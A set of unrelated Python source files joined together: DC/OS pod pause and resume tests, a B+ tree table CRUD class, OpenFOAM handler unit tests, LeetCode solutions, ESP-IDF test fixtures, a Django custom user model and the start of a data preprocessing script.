companion_task = get_task_status(pod_status, 'hello-0-companion')
assert companion_task['status'] == 'RUNNING'
# pause the task, wait for it to relaunch
hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
pause_result = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod pause hello-0 -t server', json=True
)
assert len(pause_result) == 2
assert pause_result['pod'] == 'hello-0'
assert len(pause_result['tasks']) == 1
assert pause_result['tasks'][0] == 'hello-0-server'
sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
config.check_running()
# check agent didn't move, and that the command has changed:
pod_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
)
assert len(pod_info) == 2
task_info = get_task_info(pod_info, 'hello-0-server')
assert old_agent == task_info['slaveId']['value']
cmd = task_info['command']['value']
assert 'This task is PAUSED' in cmd
readiness_check = task_info['check']['command']['command']['value']
assert 'exit 1' == readiness_check
# Minus shakedown and a spin function, give the plan a little time to catch up
time.sleep(2)
# check PAUSED state
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-0-server')
assert task_status['status'] == 'PAUSED'
# check companion is still running
task_status = get_task_status(pod_status, 'hello-0-companion')
assert task_status['status'] == 'RUNNING'
# resume the pod again, wait for it to relaunch
hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
resume_result = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod resume hello-0 -t server', json=True
)
assert len(resume_result) == 2
assert resume_result['pod'] == 'hello-0'
assert len(resume_result['tasks']) == 1
assert resume_result['tasks'][0] == 'hello-0-server'
sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
config.check_running()
# check again that the agent didn't move:
task_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
)[0]['info']
assert old_agent == task_info['slaveId']['value']
assert old_cmd == task_info['command']['value']
# Minus shakedown and a spin function, give the plan a little time to catch up
time.sleep(2)
# check that the pod/plan status is back to normal:
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-0-server')
assert task_status['name'] == 'hello-0-server'
assert task_status['status'] == 'RUNNING'
phase = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
)['phases'][0]
assert phase['name'] == 'hello-deploy'
assert phase['status'] == 'COMPLETE'
assert phase['steps'][0]['name'] == 'hello-0:[server]'
assert phase['steps'][0]['status'] == 'COMPLETE'
@pytest.mark.soak_pod_pause
def test_pause_all_pod_tasks():
# get current agent id:
pod_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
)
task_info = get_task_info(pod_info, 'hello-0-server')
old_agent = task_info['slaveId']['value']
old_server_cmd = task_info['command']['value']
task_info = get_task_info(pod_info, 'hello-0-companion')
old_companion_cmd = task_info['command']['value']
# sanity check of pod status/plan status before we pause/resume:
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
)
assert len(pod_status['tasks']) == 2
server_task = get_task_status(pod_status, 'hello-0-server')
assert server_task['status'] == 'RUNNING'
phase = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
)['phases'][0]
assert phase['name'] == 'hello-deploy'
assert phase['status'] == 'COMPLETE'
assert phase['steps'][0]['name'] == 'hello-0:[server]'
assert phase['steps'][0]['status'] == 'COMPLETE'
assert phase['steps'][1]['name'] == 'hello-0:[companion]'
assert phase['steps'][1]['status'] == 'COMPLETE'
companion_task = get_task_status(pod_status, 'hello-0-companion')
assert companion_task['status'] == 'RUNNING'
# pause the pod, wait for it to relaunch
hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
pause_result = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod pause hello-0', json=True
)
assert len(pause_result) == 2
assert pause_result['pod'] == 'hello-0'
assert len(pause_result['tasks']) == 2
assert 'hello-0-server' in pause_result['tasks']
assert 'hello-0-companion' in pause_result['tasks']
sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
config.check_running()
# check agent didn't move, and that the commands have changed:
pod_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
)
assert len(pod_info) == 2
task_info = get_task_info(pod_info, 'hello-0-server')
assert old_agent == task_info['slaveId']['value']
cmd = task_info['command']['value']
assert 'This task is PAUSED' in cmd
readiness_check = task_info['check']['command']['command']['value']
assert 'exit 1' == readiness_check
task_info = get_task_info(pod_info, 'hello-0-companion')
assert old_agent == task_info['slaveId']['value']
cmd = task_info['command']['value']
assert 'This task is PAUSED' in cmd
readiness_check = task_info['check']['command']['command']['value']
assert 'exit 1' == readiness_check
# Minus shakedown and a spin function, give the plan a little time to catch up
time.sleep(3)
# check PAUSED state
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-0-server')
assert task_status['status'] == 'PAUSED'
task_status = get_task_status(pod_status, 'hello-0-companion')
assert task_status['status'] == 'PAUSED'
# resume the pod again, wait for it to relaunch
hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
resume_result = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod resume hello-0', json=True
)
assert len(resume_result) == 2
assert resume_result['pod'] == 'hello-0'
assert len(resume_result['tasks']) == 2
assert 'hello-0-server' in resume_result['tasks']
assert 'hello-0-companion' in resume_result['tasks']
sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
config.check_running()
# check again that the agent didn't move:
pod_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
)
task_info = get_task_info(pod_info, 'hello-0-server')
assert old_agent == task_info['slaveId']['value']
assert old_server_cmd == task_info['command']['value']
task_info = get_task_info(pod_info, 'hello-0-companion')
assert old_agent == task_info['slaveId']['value']
assert old_companion_cmd == task_info['command']['value']
# Minus shakedown and a spin function, give the plan a little time to catch up
time.sleep(2)
# check that the pod/plan status is back to normal:
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-0-server')
assert task_status['status'] == 'RUNNING'
task_status = get_task_status(pod_status, 'hello-0-companion')
assert task_status['status'] == 'RUNNING'
phase = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
)['phases'][0]
assert phase['name'] == 'hello-deploy'
assert phase['status'] == 'COMPLETE'
assert phase['steps'][0]['name'] == 'hello-0:[server]'
assert phase['steps'][0]['status'] == 'COMPLETE'
assert phase['steps'][1]['name'] == 'hello-0:[companion]'
assert phase['steps'][1]['status'] == 'COMPLETE'
@pytest.mark.soak_pod_pause
def test_multiple_pod_pause():
pod_agents = []
pod_commands = []
# get agent id for each hello pod we're pausing:
for i in range(10):
task_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-{}'.format(i), json=True
)[0]['info']
pod_agents.append(task_info['slaveId']['value'])
pod_commands.append(task_info['command']['value'])
# check that their respective deploy steps are complete, and their tasks are running
phase = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
)['phases'][0]
assert phase['name'] == 'hello-deploy'
assert phase['status'] == 'COMPLETE'
for i in range(10):
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME,
config.SERVICE_NAME,
'pod status hello-{} --json'.format(i),
json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-{}-server'.format(i))['status']
assert task_status == 'RUNNING'
task_status = get_task_status(pod_status, 'hello-{}-companion'.format(i))['status']
assert task_status == 'RUNNING'
assert phase['steps'][i * 2]['name'] == 'hello-{}:[server]'.format(i)
assert phase['steps'][i * 2]['status'] == 'COMPLETE'
assert phase['steps'][i * 2 + 1]['name'] == 'hello-{}:[companion]'.format(i)
assert phase['steps'][i * 2 + 1]['status'] == 'COMPLETE'
# get current task ids for all pods
pod_task_ids = []
for i in range(10):
pod_task_ids.append(
sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-{}-server'.format(i))
)
# pause all hello pods
pause_results = []
for i in range(10):
pause_results.append(sdk_cmd.svc_cli(
config.PACKAGE_NAME,
config.SERVICE_NAME,
'debug pod pause hello-{} -t server'.format(i),
json=True
))
# verify pauses were all successful
for i, pause_result in enumerate(pause_results):
assert len(pause_result) == 2
assert pause_result['pod'] == 'hello-{}'.format(i)
assert len(pause_result['tasks']) == 1
assert pause_result['tasks'][0] == 'hello-{}-server'.format(i)
sdk_tasks.check_tasks_updated(
config.SERVICE_NAME, 'hello-{}-server'.format(i), pod_task_ids[i]
)
config.check_running()
# verify that they're on the agents, and with different commands
for i in range(10):
pod_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-{}'.format(i), json=True
)
assert len(pod_info) == 2
task_info = get_task_info(pod_info, 'hello-{}-server'.format(i))
assert pod_agents[i] == task_info['slaveId']['value']
cmd = task_info['command']['value']
assert 'This task is PAUSED' in cmd
readiness_check = task_info['check']['command']['command']['value']
assert 'exit 1' == readiness_check
# verify they've all reached the PAUSED state in plan and pod status:
for i in range(10):
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME,
config.SERVICE_NAME,
'pod status hello-{} --json'.format(i),
json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-{}-server'.format(i))
assert task_status['status'] == 'PAUSED'
task_status = get_task_status(pod_status, 'hello-{}-companion'.format(i))
assert task_status['status'] == 'RUNNING'
# verify that the 11th hello pod is unaffacted
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-10 --json', json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-10-server')
assert task_status['status'] == 'RUNNING'
task_status = get_task_status(pod_status, 'hello-10-companion')
assert task_status['status'] == 'RUNNING'
assert phase['steps'][20]['name'] == 'hello-10:[server]'
assert phase['steps'][20]['status'] == 'COMPLETE'
assert phase['steps'][21]['name'] == 'hello-10:[companion]'
assert phase['steps'][21]['status'] == 'COMPLETE'
# get paused task ids
paused_pod_task_ids = []
for i in range(10):
paused_pod_task_ids.append(
sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-{}-server'.format(i))
)
# resume all pods
resume_results = []
for i in range(10):
resume_results.append(sdk_cmd.svc_cli(
config.PACKAGE_NAME,
config.SERVICE_NAME,
'debug pod resume hello-{} -t server'.format(i),
json=True
))
# verify that the resumes were successful
for i, resume_result in enumerate(resume_results):
assert len(resume_result) == 2
assert resume_result['pod'] == 'hello-{}'.format(i)
assert len(resume_result['tasks']) == 1
assert resume_result['tasks'][0] == 'hello-{}-server'.format(i)
sdk_tasks.check_tasks_updated(
config.SERVICE_NAME, 'hello-{}-server'.format(i), paused_pod_task_ids[i]
)
config.check_running()
# verify that the agents are still the same, and the commands are restored
for i in range(10):
pod_info = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-{}'.format(i), json=True
)
task_info = get_task_info(pod_info, 'hello-{}-server'.format(i))
assert pod_agents[i] == task_info['slaveId']['value']
assert pod_commands[i] == task_info['command']['value']
phase = sdk_cmd.svc_cli(
config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
)['phases'][0]
assert phase['name'] == 'hello-deploy'
assert phase['status'] == 'COMPLETE'
# verify they've all reached the COMPLETE state in plan and pod status:
for i in range(10):
pod_status = sdk_cmd.svc_cli(
config.PACKAGE_NAME,
config.SERVICE_NAME,
'pod status hello-{} --json'.format(i),
json=True
)
assert len(pod_status['tasks']) == 2
task_status = get_task_status(pod_status, 'hello-{}-server'.format(i))
assert task_status['status'] == 'RUNNING'
assert phase['steps'][i * 2]['name'] == 'hello-{}:[server]'.format(i)
assert phase['steps'][i * 2]['status'] == 'COMPLETE'
assert phase['steps'][i * 2 + 1]['name'] == 'hello-{}:[companion]'.format(i)
assert phase['steps'][i * 2 + 1]['status'] == 'COMPLETE'
|
#!/usr/bin/env python
__author__ = 'Michael Meisinger'
from pyon.core.governance import ANONYMOUS_ACTOR
from pyon.public import log, CFG, BadRequest, EventPublisher, Conflict, Unauthorized, NotFound, PRED, OT, RT
from interface.services.scion.iscion_management import BaseScionManagement
class ScionManagementServiceBase(BaseScionManagement):
def on_init(self):
self.rr = self.clients.resource_registry
self.event_repo = self.container.event_repository
self.idm_client = self.clients.identity_management
self.rm_client = self.clients.resource_management
self.evt_pub = EventPublisher(process=self)
# -------------------------------------------------------------------------
def _get_actor_id(self):
"""Return the ion-actor-id from the context, if set and present.
Note: may return the string 'anonymous' for an unauthenticated user"""
ctx = self.get_context()
ion_actor_id = ctx.get('ion-actor-id', None) if ctx else None
return ion_actor_id
def _actor_context(self):
ctx = self.get_context()
ion_actor_id = ctx.get('ion-actor-id', None) if ctx else None
return dict(actor_id=ion_actor_id)
def _get_actor_roles(self):
"""Return the ion-actor-roles from the context, if set and present."""
ctx = self.get_context()
ion_actor_roles = ctx.get('ion-actor-roles', {}) if ctx else {}
return ion_actor_roles
def _as_actor_id(self, actor_id=None):
current_actor_id = self._get_actor_id()
if current_actor_id == ANONYMOUS_ACTOR:
current_actor_id = None
if actor_id and not current_actor_id:
# This may be ok for some guest calls, but is dangerous
pass
elif actor_id and actor_id != current_actor_id:
# This should only be allowed for a superuser or within the same org
pass
return actor_id or current_actor_id
|
# Package: Python
# License: Released under MIT License
# Notice: Copyright (c) 2020 TytusDB Team
# Developer: Maynor Piló Tuy
import os
import time
from storageManager.ArbolBmas import ArbolBmas
# CLASE PARA INSTANCIAR CADA UNA DE LAS FUNCIONES :
class CrudTuplas:
def __init__(self, columas):
self.pk = [] #Lista de llaves primarias que recibe de la tabla
#self.fk = fk #Lista de llaves foraneas que recibe de la tabla
self.auto = 0 #autoincremental cuando no existan llaves
self.tamCol = columas # contiene el tamaño de la columan que se definio en la tabla
self.pkactuales= [] # lista para corroborar las llaves primarias
self.tabla = ArbolBmas()
##########################################################################################################
############ FUNCIONES CRUD TUPLAS ############
##########################################################################################################
# FUNCTION 1 - INSERT(LIST) - RECIBE COMO PARAMETRO UNA LISTA Y RETORNA INT
# 0 OPERACION EXITOSA
# 4 LLAVE PRIMARIA DUPLICADA
# 5 COLUMNAS FUERA DE LIMITES
def insert(self, tupla):
#comprobar si el rango de columnas es la correcta
try:
if len(tupla) != self.tamCol:
#print("Error 5")
return 5
else:
if len(self.pk) != 0: # CUANDO EXISTEN LLAVES PRIMARIAS
pkey = ""
for k in self.pk:
pkey +=str(tupla[k])+"_"
pkey=pkey[:-1]
if pkey in self.pkactuales:
#print("Error 4")
return 4
else:
self.tabla.insertar(str(pkey),tupla)
self.pkactuales.append(pkey)
#print("Error 0")
return 0
else:
self.tabla.insertar(str(self.auto), tupla)
self.pkactuales.append(str(self.auto))
self.auto += 1
return 0
except ( IndexError):
#print("Error 1")
return 1
# FUNCION 2 - LOAD CSV () RECIBE COMO PARAMETRO FILE:STR RETORNA UNA LISTA CON LAS LINEAS EXITOSAS
# 1 ERROR EN OPERACION
# 4 LLAVE PRIMARIA DUPLICADA
# COLUMNA FUERA DE LIMITES
def loadCSV(self, file):
lista_retorno = [] # lista que contendra los valores de retorno
try:
archivo = open(file,'r',encoding='UTF-8') #,encoding='UTF-8'
# procesar el archivo
data = archivo.readlines()
archivo.close()
# se procede a recorrer las lineas de la lista y se insertan en los nodos del arbol
# variable ret es la encargada de recibir el numero de retorno de la funcion insertar
for d in data:
d=d.rstrip('\r\n\t')
de=d.split(",")
ret=self.insert(de)
lista_retorno.append(ret)
return lista_retorno # retorno de la lista con los valores ingresados
except IOError:
#print ("Error de entrada")
lista_retorno = []
return []
#FUNCION 3 - EXCTRACROW RECIBE COMO PARAMETRO UNA LISTA DE COLUMNAS Y RETORNA UNA LISTA
def extractRow(self, columns):
pkey = ""
for k in columns:
pkey +=str(k)+"_"
pkey=pkey[:-1]
resultado = self.tabla.Busqueda(pkey)
return resultado
#FUNCION 4 - UPDATE RECIBE COMO PARAMETRO UN DICCIONARIO DE LOS DATOS PARA ACTUALIZAR Y UNA COLUMNA CON LAS LLAVES PRIMARIAS
# 0 OPREACION EXITOSA
# 1 ERROR EN LA OPERACION
# 4 LLAVE PRIMARIA NO EXISTE
def update(self, register, columns):
pkey = ""
for k in columns:
pkey +=str(k)+"_"
pkey=pkey[:-1]
resultado = self.tabla.Update(register, pkey)
return resultado
# FUNCION 5 - DELETE : RECIBE COMO PARAMETROS LA COLUMNA CON LA LLAVE PRIMARIA
# 0 FUNCION EXITOSA
# 1 ERROR EN LA OPERACION
# 4 LLAVE PRIMARIA NO EXISTE
def delete(self,columns):
try:
pkey = ""
for k in columns:
pkey +=str(k)+"_"
pkey=pkey[:-1]
resultado = self.tabla.eliminar(pkey)
if resultado :
return 0
else:
return 4
except (TypeError):
return 1
# FUNCION 6 -
def truncateRaiz(self):
self.tabla.truncateRoot()
##########################################################################################################
############ FUNCIONES AUX CRUD TABLAS ############
##########################################################################################################
#FUNCION 1 : NO RECIBE PARAMETROS, DEVULVE UNA LISTA CON LOS REGISTROS O LISTA VACIA
def extractTable(self):
registros = self.tabla.ListaEnlazada(None,None,None)
return registros
# FUNCION 2: EXTRACT RANGE RECIBE COMO PARAMETRO COLUMN INT= INDICE DE COLUMNA A RESTRINGIR LOWER: INFERIOR UPPER:SUPERIOR
# LISTA CON PARAMETRO
# LISTA VACIA
def extractRangeTable(self,columns,lower,upper ):
registros = self.tabla.ListaEnlazada(columns,lower,upper)
return registros
#FUNCION 3: def alterAddPK RECIBE COMO PARAMETRO LA LISTA DE LOS INDICES DE LA LLAVE PRIMARIA
# 0 OPERACION EXITOSA
# 1 ERROR EN LA OPERACION
# 4 LLAVE PRIMARIA EXISTENTE
# 5 COLUMNAS FUERA DE LIMITE
def alterAddPK(self,keys ):
# llaves primarias existentes
if self.pk:
return 4
else:
# llaves fuera de columna
for k in keys:
if k>self.tamCol:
return 5
# comprobamos si hay valores en la lista:
listado = self.tabla.Claves_Hojas()
if len(listado) == 0: # no hay registros en el arbol
self.pk = keys
return 0
else: # si hay registros en la tabla
# se ingresa las keys en el listado de llaves
self.pk = keys
# se comprueba si hay registros con llaves repetidas
pktemp=[] # contiene las llaves primarias temporales
# se crean las llaves temporales
try:
for d in listado:
pkey = ""
for k in self.pk:
pkey +=str(d.data[k])+"_"
pkey=pkey[:-1]
if pkey in pktemp: # corrobora si existe la llave genera en el listado temporal
return 1
else:
pktemp.append(pkey)
except (IndexError):
return 5
# se elimina cada registro
for c in listado:
# se elimina primero el registro
self.delete([c.clave])
# se inserta el nuevo valor
self.insert(c.data)
return 0
#FUNCION 4: def alterDropPK
def alterDropPK(self):
try:
if len(self.pk)==0:
return 4
else:
self.pk=[]
return 0
except TypeError:
return 1
#FUNCION 5: ALTER ADD COLUMN, AGREGA UNA COLUMNA AL FINAL DE CADA REGISTRO : REIBE COMO PARAMETRO: DEFAULT: ANY
def alterAddColumn( self,default):
result = self.tabla.AlterCol("Add",default)
if result ==0:
self.tamCol +=1
return result
#FUNCION 5: ALTER ADD COLUMN, ElIMINA UNA COLUMNA EN CADA REGISTRO : REIBE COMO PARAMETRO: INDICE DE COLUMNA
def alterDropColumn( self,col):
try:
ingresar = True
col = int(col)
if ingresar:
if self.tamCol-1 <= 0 :
return 4
elif col > self.tamCol :
return 5
elif self.pk:
if col in self.pk:
return 4
else:
result = self.tabla.AlterCol("Drop",col)
self.tamCol -=1
return result
else:
result = self.tabla.AlterCol("Drop",col)
self.tamCol -=1
return result
else:
return 4
except (ValueError):
return 4
def graficar(self):
self.tabla.graphviz()
|
from unittest import TestCase
import unittest
import pygem.openfhandler as ofh
import numpy as np
import filecmp
import os
class TestOpenFoamHandler(TestCase):
def test_open_foam_instantiation(self):
open_foam_handler = ofh.OpenFoamHandler()
def test_open_foam_default_infile_member(self):
open_foam_handler = ofh.OpenFoamHandler()
self.assertIsNone(open_foam_handler.infile)
def test_open_foam_default_outfile_member(self):
open_foam_handler = ofh.OpenFoamHandler()
self.assertIsNone(open_foam_handler.outfile)
def test_open_foam_default_extension_member(self):
open_foam_handler = ofh.OpenFoamHandler()
self.assertListEqual(open_foam_handler.extensions, [''])
def test_open_foam_parse_failing_filename_type(self):
open_foam_handler = ofh.OpenFoamHandler()
with self.assertRaises(TypeError):
mesh_points = open_foam_handler.parse(.2)
def test_open_foam_parse_failing_check_extension(self):
open_foam_handler = ofh.OpenFoamHandler()
with self.assertRaises(ValueError):
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_square.iges')
def test_open_foam_parse_infile(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
self.assertEqual(open_foam_handler.infile,
'tests/test_datasets/test_openFOAM')
def test_open_foam_parse_shape(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
self.assertTupleEqual(mesh_points.shape, (21812, 3))
def test_open_foam_parse_coords_1(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
np.testing.assert_almost_equal(mesh_points[33][0], 1.42254)
def test_open_foam_parse_coords_2(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
np.testing.assert_almost_equal(mesh_points[1708][1], -3.13059)
def test_open_foam_parse_coords_3(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
np.testing.assert_almost_equal(mesh_points[3527][2], .0)
def test_open_foam_parse_coords_4(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
np.testing.assert_almost_equal(mesh_points[0][0], -17.5492)
def test_open_foam_parse_coords_5(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
np.testing.assert_almost_equal(mesh_points[-1][2], 0.05)
def test_open_foam_write_failing_filename_type(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
with self.assertRaises(TypeError):
open_foam_handler.write(mesh_points, -1.)
def test_open_foam_write_failing_check_extension(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
with self.assertRaises(ValueError):
open_foam_handler.write(mesh_points,
'tests/test_datasets/test_square.iges')
def test_open_foam_write_failing_infile_instantiation(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = np.zeros((40, 3))
with self.assertRaises(RuntimeError):
open_foam_handler.write(mesh_points,
'tests/test_datasets/test_openFOAM_out')
def test_open_foam_write_outfile(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
outfilename = 'tests/test_datasets/test_openFOAM_out'
open_foam_handler.write(mesh_points, outfilename)
self.assertEqual(open_foam_handler.outfile, outfilename)
self.addCleanup(os.remove, outfilename)
def test_open_foam_write_comparison(self):
open_foam_handler = ofh.OpenFoamHandler()
mesh_points = open_foam_handler.parse(
'tests/test_datasets/test_openFOAM')
mesh_points[0] = [-14., 1.55, 0.2]
mesh_points[1] = [-14.3, 2.55, 0.3]
mesh_points[2] = [-14.3, 2.55, 0.3]
mesh_points[2000] = [7.8, -42.8, .0]
mesh_points[2001] = [8.8, -41.8, .1]
mesh_points[2002] = [9.8, -40.8, .0]
mesh_points[-3] = [236.3, 183.7, 0.06]
mesh_points[-2] = [237.3, 183.7, 0.06]
mesh_points[-1] = [236.3, 185.7, 0.06]
outfilename = 'tests/test_datasets/test_openFOAM_out'
outfilename_expected = 'tests/test_datasets/test_openFOAM_out_true'
open_foam_handler.write(mesh_points, outfilename)
self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
self.addCleanup(os.remove, outfilename)
|
__________________________________________________________________________________________________
sample 192 ms submission
class Solution:
def findCircleNum(self, M: List[List[int]]) -> int:
seen = set()
def visit_all_friends(i: int):
for friend_idx,is_friend in enumerate(M[i]):
if is_friend and friend_idx not in seen:
seen.add(friend_idx)
visit_all_friends(friend_idx)
count = 0
for ridx in range(len(M)):
if ridx not in seen:
visit_all_friends(ridx)
count += 1
return count
__________________________________________________________________________________________________
sample 13172 kb submission
class Solution:
def findCircleNum(self, M: List[List[int]]) -> int:
def dfs1(r, c, circle):
frds = [r, c]
f_s = {r, c}
i = 0
while i < len(frds):
j = frds[i]
for k in range(len(M)):
if M[j][k] == 1 and k not in f_s:
f_s.add(k)
frds.append(k)
i = i + 1
for i in f_s:
for j in f_s:
M[i][j] = circle
circle = 1
for i in range(len(M)):
for j in range(len(M[0])):
if M[i][j] == 1:
circle = circle + 1
dfs1(i, j, circle)
break
return circle - 1
__________________________________________________________________________________________________
|
default_app_config = 'tenant_resource.apps.TenantResourceConfig'
|
# SPDX-FileCopyrightText: 2022 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import logging
import pytest
from _pytest.fixtures import FixtureRequest
from _pytest.monkeypatch import MonkeyPatch
from pytest_embedded_idf.serial import IdfSerial
# This is a custom Serial Class to add the erase_flash functionality
class FlashEncSerial(IdfSerial):
@IdfSerial.use_esptool
def erase_partition(self, partition_name: str) -> None:
if partition_name is None:
logging.error('Invalid arguments')
return
if not self.app.partition_table:
logging.error('Partition table not parsed.')
return
if partition_name in self.app.partition_table:
address = self.app.partition_table[partition_name]['offset']
size = self.app.partition_table[partition_name]['size']
logging.info('Erasing the partition {0} of size {1} at {2}'.format(partition_name, size, address))
self.stub.erase_region(address, size)
else:
logging.error('partition name {0} not found in app partition table'.format(partition_name))
return
@pytest.fixture(scope='module')
def monkeypatch_module(request: FixtureRequest) -> MonkeyPatch:
mp = MonkeyPatch()
request.addfinalizer(mp.undo)
return mp
@pytest.fixture(scope='module', autouse=True)
def replace_dut_class(monkeypatch_module: MonkeyPatch) -> None:
monkeypatch_module.setattr('pytest_embedded_idf.serial.IdfSerial', FlashEncSerial)
|
import uuid
from django.db import models
from django.utils.text import Truncator
from django.contrib.auth.models import PermissionsMixin, AbstractBaseUser, BaseUserManager
from django.conf import settings
UPLOAD_DIRECTORY_PROFILEPHOTO = 'images_profilephoto'
class CustomUserManager(BaseUserManager):
"""
Custom user manager to handle all the operations for the Custom User model
"""
def create_user(self, user_id, mobile_number, email, password, **extra_fields):
user = self.model(user_id=user_id, mobile_number=mobile_number, email=email, *extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, user_id, mobile_number, email, password, **extra_fields):
user = self.create_user(user_id, mobile_number, email, password, **extra_fields)
user.is_admin=True
user.is_superuser = True
user.save(using=self._db)
return user
def get_by_natural_key(self, username):
return self.get(user_id=username)
class User(AbstractBaseUser, PermissionsMixin):
"""
User that is capable of using the Information System
"""
GENDER = [
('MALE', "MALE"),
('FEMALE', "FEMALE"),
('TRANSGENDER', "TRANSGENDER"),
('PREFER_NOT_TO_SAY', "PREFER_NOT_TO_SAY")
]
user_id = models.CharField(max_length=24, null=True, blank=True, unique=True, help_text="User's unique user id, keep it irrelated with respect to your name or email.")
full_name = models.CharField(max_length=255, null=True, blank=True, help_text="User's full name")
gender = models.CharField(max_length=255, choices=GENDER, null=True, blank=True, help_text="User's Gender")
email = models.EmailField(max_length=255, blank=True, null=True, default='', help_text="User's Email")
mobile_number = models.CharField(max_length=10, blank=True, null=True, help_text="User's Mobile number")
profile_photo = models.ImageField(max_length=255, blank=True, null=True, upload_to=UPLOAD_DIRECTORY_PROFILEPHOTO, help_text="User's Profile photo")
pincode = models.CharField(max_length=6, help_text="User's Residential pincode")
is_admin = models.BooleanField(default=False)
objects = CustomUserManager()
USERNAME_FIELD = 'user_id'
REQUIRED_FIELDS = ['mobile_number', 'email',]
UNIQUE_TOGETHER = ['user_id', 'email']
def __str__(self):
return '%s - %s'%(self.id, self.full_name)
@property
def is_staff(self):
"Is the user a member of staff?"
# Simplest possible answer: All admins are staff
return self.is_admin |
# Python script to pre-process Duke data:
# o reorganizes the directory structire into LabCAS archive format
# o creates the dataset metadata file
import os
import sys
from glob import glob
from shutil import copyfile
import dicom
# process data from $LABCAS_ARCHIVE/Duke --> $LABCAS_ARCHIVE/Sample_Mammography_Reference_Set
COLLECTION_NAME = "Sample_Mammography_Reference_Set"
TARGET_DATA_DIR=os.environ['LABCAS_ARCHIVE'] + "/" + COLLECTION_NAME
SRC_DATA_DIR=os.environ['LABCAS_ARCHIVE'] + "/Duke"
METADATA_DIR=os.environ['LABCAS_METADATA'] + "/" + COLLECTION_NAME
INSTITUTION = "Duke"
def main():
